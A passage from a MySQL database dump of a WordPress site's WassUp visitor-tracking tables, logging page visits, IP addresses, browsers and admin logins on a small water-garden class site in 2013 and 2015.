MSNcIA)','http://wpclass.thegammonpress.com/ed2goclass/wp-admin/admin.php?page=wassup-online','',0,'Win7 x64','IE 10','us','','','','','Ed2goBill','','0','0'),(6,'de1173a371418cffe4e242dbebcbcce0','1372253943','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/wp-login.php?loggedout=true','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA)','http://wpclass.thegammonpress.com/ed2goclass/wp-admin/admin.php?page=wassup-online','',0,'Win7 x64','IE 10','us','','','','','','','0','0'),(7,'2c07f238aa4e7bed028470a3c9662864','1372510819','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/wp-login.php?redirect_to=http%3A%2F%2Fwpclass.thegammonpress.com%2Fed2goclass%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA)','','',0,'Win7 x64','IE 10','us','','','','','','','0','0'),(8,'2c07f238aa4e7bed028470a3c9662864','1372510830','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/wp-login.php','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA)','http://wpclass.thegammonpress.com/ed2goclass/wp-login.php?redirect_to=http%3A%2F%2Fwpclass.thegammonpress.com%2Fed2goclass%2Fwp-admin%2F&reauth=1','',0,'Win7 x64','IE 10','us','','','','','','','0','0'),(9,'782c08b06bd99067b0350e41d256cb5c','1372511469','205.178.145.68','205.178.145.68','/ed2goclass/wp-cron.php?doing_wp_cron=1372525838.7079629898071289062500','WordPress/3.5.1; http://wpclass.thegammonpress.com/ed2goclass','','',0,'','','','','','Wordpress','','','','0','0'),(10,'2c07f238aa4e7bed028470a3c9662864','1372511664','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA)','http://wpclass.thegammonpress.com/ed2goclass/wp-admin/theme-editor.php?file=404.php&theme=Marina','',0,'Win7 x64','IE 10','us','','','','','Ed2goBill','','0','6'),(11,'572db3d7b45711ec2c9f1f9c04b05c50','1372511675','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/articles/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA)','http://wpclass.thegammonpress.com/ed2goclass/','',0,'Win7 x64','IE 10','us','1366 x 768','','','','Ed2goBill','','0','0'),(12,'572db3d7b45711ec2c9f1f9c04b05c50','1372511886','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA)','http://wpclass.thegammonpress.com/ed2goclass/wp-admin/theme-editor.php?file=index.php&theme=Marina&scrollto=0&updated=true','',0,'Win7 x64','IE 10','us','1366 x 768','','','','Ed2goBill','','0','6'),(13,'572db3d7b45711ec2c9f1f9c04b05c50','1372511891','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/articles/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA)','http://wpclass.thegammonpress.com/ed2goclass/','',0,'Win7 x64','IE 10','us','1366 x 768','','','','Ed2goBill','','0','0'),(14,'572db3d7b45711ec2c9f1f9c04b05c50','1372511968','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA)','http://wpclass.thegammonpress.com/ed2goclass/articles/','',0,'Win7 x64','IE 10','us','1366 x 768','','','','Ed2goBill','','0','6'),(15,'eb9d49495b5f44585dd104a3a0c0191c','1372512787','205.178.145.66','205.178.145.66','/ed2goclass/wp-cron.php?doing_wp_cron=1372527156.6624140739440917968750','WordPress/3.5.1; http://wpclass.thegammonpress.com/ed2goclass','','',0,'','','','','','Wordpress','','','','0','0'),(16,'572db3d7b45711ec2c9f1f9c04b05c50','1372512948','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA)','http://wpclass.thegammonpress.com/ed2goclass/wp-admin/options-reading.php?settings-updated=true','',0,'Win7 x64','IE 10','us','1366 x 768','','','','Ed2goBill','','0','0'),(17,'572db3d7b45711ec2c9f1f9c04b05c50','1372513218','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA)','http://wpclass.thegammonpress.com/ed2goclass/wp-admin/nav-menus.php','',0,'Win7 x64','IE 10','us','1366 x 768','','','','Ed2goBill','','0','0'),(18,'572db3d7b45711ec2c9f1f9c04b05c50','1372513676','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/wp-login.php?action=logout&_wpnonce=17b04618fe','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA)','http://wpclass.thegammonpress.com/ed2goclass/','',0,'Win7 x64','IE 10','us','1366 x 768','','','','Ed2goBill','','0','0'),(19,'572db3d7b45711ec2c9f1f9c04b05c50','1372513676','108.7.59.54','pool-108-7-59-54.bstnma.fios.verizon.net','/ed2goclass/wp-login.php?loggedout=true','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbDELL; MSNmen-us; MSNcIA)','http://wpclass.thegammonpress.com/ed2goclass/','',0,'Win7 x64','IE 10','us','1366 x 768','','','','','','0','0'),(20,'bce6b8a89bbcecdb27b00058198dc199','1423149264','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','0'),(21,'bce6b8a89bbcecdb27b00058198dc199','1423149305','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/build-a-water-garden/planning/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','47'),(22,'bce6b8a89bbcecdb27b00058198dc199','1423149308','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/build-a-water-garden/step-by-step-guide/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/planning/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','49'),(23,'97533cbe40a6ddeac846da8812fb8104','1423149311','10.30.72.4','unknown','/ed2goclass/wp-cron.php?doing_wp_cron=1423167262.9852058887481689453125','WordPress/3.5.1; http://wpclass.thegammonpress.com/ed2goclass','','',0,'','','','','','Wordpress','','','','0','0'),(24,'bce6b8a89bbcecdb27b00058198dc199','1423149312','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/build-a-water-garden/materials-list/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/planning/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','8'),(25,'bce6b8a89bbcecdb27b00058198dc199','1423149314','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/articles/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/materials-list/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','14'),(26,'bce6b8a89bbcecdb27b00058198dc199','1423149322','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/build-a-water-garden/step-by-step-guide/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/materials-list/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','49'),(27,'bce6b8a89bbcecdb27b00058198dc199','1423149324','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/step-by-step-guide/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','71'),(28,'bce6b8a89bbcecdb27b00058198dc199','1423149339','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/add-features/waterfalls-fountains/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/step-by-step-guide/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','29'),(29,'bce6b8a89bbcecdb27b00058198dc199','1423149341','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/add-features/lighting/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/add-features/waterfalls-fountains/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','31'),(30,'bce6b8a89bbcecdb27b00058198dc199','1423149353','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/add-features/bridges/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/add-features/lighting/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','33'),(31,'bce6b8a89bbcecdb27b00058198dc199','1423149357','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/add-fish-wildlife/planning/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/add-features/bridges/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','35'),(32,'bce6b8a89bbcecdb27b00058198dc199','1423149360','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/maintaining-a-water-garden/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/add-features/bridges/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','27'),(33,'bce6b8a89bbcecdb27b00058198dc199','1423149364','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/add-features/waterfalls-fountains/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/maintaining-a-water-garden/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','29'),(34,'bce6b8a89bbcecdb27b00058198dc199','1423149364','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/articles/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/maintaining-a-water-garden/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','14'),(35,'bce6b8a89bbcecdb27b00058198dc199','1423149366','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/add-flowers-plants/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/articles/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','21'),(36,'bce6b8a89bbcecdb27b00058198dc199','1423149372','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/articles/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','71'),(37,'bce6b8a89bbcecdb27b00058198dc199','1423149376','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/shopping-cart/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/contact/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','84'),(38,'bce6b8a89bbcecdb27b00058198dc199','1423149464','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/wp-admin/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','0'),(39,'bce6b8a89bbcecdb27b00058198dc199','1423149464','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/wp-login.php?redirect_to=http%3A%2F%2Fwpclass.thegammonpress.com%2Fed2goclass%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','0'),(40,'bce6b8a89bbcecdb27b00058198dc199','1423149501','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/wp-login.php','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/wp-login.php?redirect_to=http%3A%2F%2Fwpclass.thegammonpress.com%2Fed2goclass%2Fwp-admin%2F&reauth=1','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','0'),(41,'f0c2929374fb99ed1588005096505ee9','1423502138','10.30.72.4','unknown','/ed2goclass/wp-cron.php?doing_wp_cron=1423520092.9111099243164062500000','WordPress/3.5.1; http://wpclass.thegammonpress.com/ed2goclass','','',0,'','','','','','Wordpress','','','','0','0'),(42,'3a5db7f77e434e0b7c0290d134c7acff','1423673549','10.30.72.4','unknown','/ed2goclass/wp-cron.php?doing_wp_cron=1423691547.6077089309692382812500','WordPress/3.5.1; http://wpclass.thegammonpress.com/ed2goclass','','',0,'','','','','','Wordpress','','','','0','0'); /*!40000 ALTER TABLE `wp_wassup` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wassup_meta` -- DROP TABLE IF EXISTS `wp_wassup_meta`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_wassup_meta` ( `meta_id` int(15) unsigned NOT NULL auto_increment, `wassup_key` varchar(150) NOT NULL, `meta_key` varchar(80) NOT NULL, `meta_value` longtext, `meta_expire` int(10) unsigned default '0', UNIQUE KEY `meta_id` (`meta_id`), KEY `wassup_key` (`wassup_key`), KEY `meta_key` (`meta_key`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_wassup_meta` -- LOCK TABLES `wp_wassup_meta` WRITE; /*!40000 ALTER TABLE `wp_wassup_meta` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_wassup_meta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_wassup_tmp` -- DROP TABLE IF EXISTS `wp_wassup_tmp`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_wassup_tmp` ( `id` mediumint(9) unsigned NOT NULL auto_increment, `wassup_id` varchar(60) NOT NULL, `timestamp` varchar(20) NOT NULL, `ip` varchar(50) default NULL, `hostname` varchar(150) default NULL, `urlrequested` text, `agent` varchar(255) default NULL, `referrer` text, `search` varchar(255) default NULL, `searchpage` int(11) unsigned default '0', `os` varchar(15) default NULL, `browser` varchar(50) default NULL, `language` varchar(5) default NULL, `screen_res` varchar(15) default NULL, `searchengine` varchar(25) default NULL, `spider` varchar(50) default NULL, `feed` varchar(50) default NULL, `username` varchar(50) default NULL, `comment_author` varchar(50) default NULL, `spam` varchar(5) default '0', `url_wpid` varchar(50) default NULL, UNIQUE KEY `id` (`id`), KEY `idx_wassup` (`wassup_id`(32),`timestamp`), KEY `os` (`os`), KEY `browser` (`browser`), KEY `timestamp` (`timestamp`) ) ENGINE=MyISAM AUTO_INCREMENT=42 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_wassup_tmp` -- LOCK TABLES `wp_wassup_tmp` WRITE; /*!40000 ALTER TABLE `wp_wassup_tmp` DISABLE KEYS */; INSERT INTO `wp_wassup_tmp` VALUES (40,'f0c2929374fb99ed1588005096505ee9','1423502138','10.30.72.4','unknown','/ed2goclass/wp-cron.php?doing_wp_cron=1423520092.9111099243164062500000','WordPress/3.5.1; http://wpclass.thegammonpress.com/ed2goclass','','',0,'','','','','','Wordpress','','','','0','0'),(38,'bce6b8a89bbcecdb27b00058198dc199','1423149464','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/wp-login.php?redirect_to=http%3A%2F%2Fwpclass.thegammonpress.com%2Fed2goclass%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','0'),(39,'bce6b8a89bbcecdb27b00058198dc199','1423149501','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/wp-login.php','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/wp-login.php?redirect_to=http%3A%2F%2Fwpclass.thegammonpress.com%2Fed2goclass%2Fwp-admin%2F&reauth=1','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','0'),(36,'bce6b8a89bbcecdb27b00058198dc199','1423149376','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/shopping-cart/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/contact/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','84'),(37,'bce6b8a89bbcecdb27b00058198dc199','1423149464','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/wp-admin/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','0'),(35,'bce6b8a89bbcecdb27b00058198dc199','1423149372','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/articles/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','71'),(34,'bce6b8a89bbcecdb27b00058198dc199','1423149366','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/add-flowers-plants/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/articles/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','21'),(33,'bce6b8a89bbcecdb27b00058198dc199','1423149364','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/articles/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/maintaining-a-water-garden/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','14'),(32,'bce6b8a89bbcecdb27b00058198dc199','1423149364','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/add-features/waterfalls-fountains/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/maintaining-a-water-garden/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','29'),(31,'bce6b8a89bbcecdb27b00058198dc199','1423149360','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/maintaining-a-water-garden/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/add-features/bridges/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','27'),(30,'bce6b8a89bbcecdb27b00058198dc199','1423149357','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/add-fish-wildlife/planning/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/add-features/bridges/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','35'),(29,'bce6b8a89bbcecdb27b00058198dc199','1423149353','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/add-features/bridges/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/add-features/lighting/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','33'),(28,'bce6b8a89bbcecdb27b00058198dc199','1423149341','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/add-features/lighting/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/add-features/waterfalls-fountains/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','31'),(27,'bce6b8a89bbcecdb27b00058198dc199','1423149339','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/add-features/waterfalls-fountains/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/step-by-step-guide/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','29'),(26,'bce6b8a89bbcecdb27b00058198dc199','1423149324','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/step-by-step-guide/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','71'),(25,'bce6b8a89bbcecdb27b00058198dc199','1423149322','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/build-a-water-garden/step-by-step-guide/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/materials-list/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','49'),(24,'bce6b8a89bbcecdb27b00058198dc199','1423149314','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/articles/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/materials-list/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','14'),(22,'97533cbe40a6ddeac846da8812fb8104','1423149311','10.30.72.4','unknown','/ed2goclass/wp-cron.php?doing_wp_cron=1423167262.9852058887481689453125','WordPress/3.5.1; http://wpclass.thegammonpress.com/ed2goclass','','',0,'','','','','','Wordpress','','','','0','0'),(23,'bce6b8a89bbcecdb27b00058198dc199','1423149312','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/build-a-water-garden/materials-list/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/planning/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','8'),(21,'bce6b8a89bbcecdb27b00058198dc199','1423149308','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/build-a-water-garden/step-by-step-guide/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/build-a-water-garden/planning/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','49'),(19,'bce6b8a89bbcecdb27b00058198dc199','1423149264','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','','',0,'Win7 x64','Firefox 15','us','','','','','','','0','0'),(20,'bce6b8a89bbcecdb27b00058198dc199','1423149305','108.7.224.113','pool-108-7-224-113.bstnma.fios.verizon.net','/ed2goclass/build-a-water-garden/planning/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://wpclass.thegammonpress.com/ed2goclass/','',0,'Win7 x64','Firefox 15','us','1366 x 768','','','','','','0','47'),(41,'3a5db7f77e434e0b7c0290d134c7acff','1423673549','10.30.72.4','unknown','/ed2goclass/wp-cron.php?doing_wp_cron=1423691547.6077089309692382812500','WordPress/3.5.1; http://wpclass.thegammonpress.com/ed2goclass','','',0,'','','','','','Wordpress','','','','0','0'); /*!40000 ALTER TABLE `wp_wassup_tmp` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping routines for database '1_0017987_0' -- DELIMITER ;; DELIMITER ; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2015-04-23 8:47:23